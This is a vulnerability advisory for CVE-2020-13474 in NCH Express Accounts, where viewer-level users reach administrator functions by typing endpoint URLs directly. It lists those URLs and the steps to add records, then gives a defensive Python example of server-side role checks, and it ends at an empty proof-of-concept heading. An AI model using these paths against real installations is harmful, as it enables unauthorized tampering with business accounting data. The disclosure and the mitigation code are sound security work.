CVE-2020-13474: NCH Express Accounts - Privilege Escalation

Vulnerable Software: NCH Express Accounts

Vulnerability: Privilege Escalation

Affected Version: 8.24 and prior

Vendor Homepage: https://www.nchsoftware.com/

CVE: CVE-2020-13474

CVE Author: Tejas Nitin Pingulkar

Exploit Available: Yes

About Affected Software

Express Accounts is professional business accounting software, perfect for small businesses needing to document and report on incoming and outgoing cash flow, including sales, receipts, payments, and purchases.

Additional Information

NCH Express Accounts can also be accessed over the web through its web interface.

The web interface provides three types of user:

  • Administrator
  • User
  • Viewer

The administrator user has access to all modules, including Create new invoice, Create new quote, Create new sales order, Create new purchase order, Apply customer payment, View credit notes, Enter new accounts payable, View chart of accounts, Make a payment, Receive a payment, Add new item, Add new customer, Suppliers list, and Add/Edit users.

A user with viewer privileges is not given access to the above-mentioned functionality, but the server does not enforce this restriction when the pages are requested directly (forceful browsing). Below, we access the admin modules using viewer user privileges.

Exploit

I have created the users below for the POC:

Admin user: admin@tejas.com

Viewer user: lowuser@tejas.com

As demonstrated in the video, "Chart of accounts" has only one entry, and lowuser@tejas.com does not have access to the "Chart of accounts" functionality (or any other module mentioned above); see the video at [2:14 min].

Log in as the low-privileged user and enter the URL below:

http://[website:port]/acclist

Click "Add new account".

Fill in all details and click OK.

Via forceful browsing, we were able to add an entry as the low-privileged user.

Similarly, via forceful browsing, we can access the functions listed below:

Add New Invoice: http://[website:port]/invoiceprop?onok=invoicelist&oncancel=invoicelist

Add New Quote: http://[website:port]/quoteprop?onok=quotelist&oncancel=quotelist

Add New Sales Order: http://[website:port]/orderprop?onok=orderlist&oncancel=orderlist

Add New Purchase Order: http://[website:port]/porderprop?onok=porderlist&oncancel=porderlist

Payment: http://[website:port]/porderprop?onok=paymentlist&oncancel=paymentlist

Credit Notes: http://[website:port]/creditnotelistperiod

Account Payable: http://[website:port]/accpayable?onok=billlist&oncancel=billlist

Chart of Accounts: http://[website:port]/acclist (video POC)

Payments and Purchases: http://[website:port]/cashtxn?payment=1

Receipts and Deposits: http://[website:port]/cashtxn?payment=0

Add New Item: http://[website:port]/itemprop?onok=itemlist&oncancel=itemlist

Add New Customer: http://[website:port]/customerprop?onok=customerlist&oncancel=customerlist

Suppliers List: http://[website:port]/supplierlist
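The root cause described above (role restrictions enforced only by which links the UI shows, while the endpoints themselves process any authenticated request) is the pattern the following example illustrates. This is an added example and not NCH code: it models a per-request, server-side role check keyed on the administrator-only paths listed in this advisory, contrasts it with a handler that never consults the session's role, and shows why hiding menu links is not an access control. The `/invoicelist` and `/quotelist` viewer-level entries, the `example.invalid` host and the function names are assumptions for illustration.

```python
"""Server-side role check of the kind whose absence CVE-2020-13474 describes (added example, not vendor code)."""
from urllib.parse import urlsplit

# Role ordering used for the check: a higher rank may do everything a lower rank may.
ROLE_RANK = {"viewer": 0, "user": 1, "administrator": 2}

# Minimum role required per endpoint path. The administrator-only paths are the
# ones listed in the advisory; the two viewer-level listing paths are assumptions
# added here for illustration and are not taken from the advisory.
REQUIRED_ROLE = {
    "/acclist": "administrator",
    "/invoiceprop": "administrator",
    "/quoteprop": "administrator",
    "/orderprop": "administrator",
    "/porderprop": "administrator",
    "/creditnotelistperiod": "administrator",
    "/accpayable": "administrator",
    "/cashtxn": "administrator",
    "/itemprop": "administrator",
    "/customerprop": "administrator",
    "/supplierlist": "administrator",
    "/invoicelist": "viewer",  # assumed read-only listing (not from the advisory)
    "/quotelist": "viewer",    # assumed read-only listing (not from the advisory)
}


def normalize_path(url: str) -> str:
    """Reduce a request URL to the path the policy is keyed on:
    query string dropped, trailing slash removed, lower-cased."""
    path = urlsplit(url).path or "/"
    path = path.rstrip("/") or "/"
    return path.lower()


def authorize(session_role: str, url: str) -> tuple[bool, int]:
    """Decide whether a session holding session_role may request url.
    Returns (allowed, http_status). Unknown paths and unknown roles are denied
    (default deny), so a new endpoint is protected until it is added to the policy."""
    path = normalize_path(url)
    needed = REQUIRED_ROLE.get(path)
    if needed is None:
        return False, 404
    if session_role not in ROLE_RANK:
        return False, 401
    if ROLE_RANK[session_role] < ROLE_RANK[needed]:
        return False, 403
    return True, 200


def menu_for(session_role: str) -> list[str]:
    """Links the UI would render for this role. Hiding a link is presentation
    only; the endpoint still has to check the role on every request."""
    rank = ROLE_RANK.get(session_role, -1)
    return sorted(p for p, r in REQUIRED_ROLE.items() if rank >= ROLE_RANK[r])


def handle_ui_gated(session_role: str, url: str) -> int:
    """Vulnerable pattern: the only 'check' is which links the menu shows.
    Any request that reaches the handler is processed; session_role is never consulted."""
    return 200


def handle_enforced(session_role: str, url: str) -> int:
    """Fixed pattern: the handler runs the authorization check before doing any work."""
    allowed, status = authorize(session_role, url)
    return status


def forceful_browsing_results(session_role: str, urls: list[str]) -> dict[str, tuple[int, int]]:
    """For a set of directly typed URLs, return {url: (ui_gated_status, enforced_status)}
    so the two patterns can be compared side by side."""
    return {u: (handle_ui_gated(session_role, u), handle_enforced(session_role, u)) for u in urls}


if __name__ == "__main__":
    # Constructed sample requests against a placeholder host.
    sample_urls = [
        "http://example.invalid/acclist",
        "http://example.invalid/invoiceprop?onok=invoicelist&oncancel=invoicelist",
        "http://example.invalid/invoicelist",
    ]
    print("viewer menu:", menu_for("viewer"))
    for url, (weak, fixed) in forceful_browsing_results("viewer", sample_urls).items():
        print(f"{url}: ui-gated={weak} enforced={fixed}")
```

The viewer's menu never lists `/acclist`, yet the UI-gated handler returns 200 for a direct request to it, which is exactly the forceful-browsing outcome the advisory reports; the enforced handler returns 403 for the same request while still allowing the viewer-level listing. Normalising the path before the lookup matters because a check keyed on the raw URL could be bypassed by a trailing slash or a query string.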

Proof Of Concept
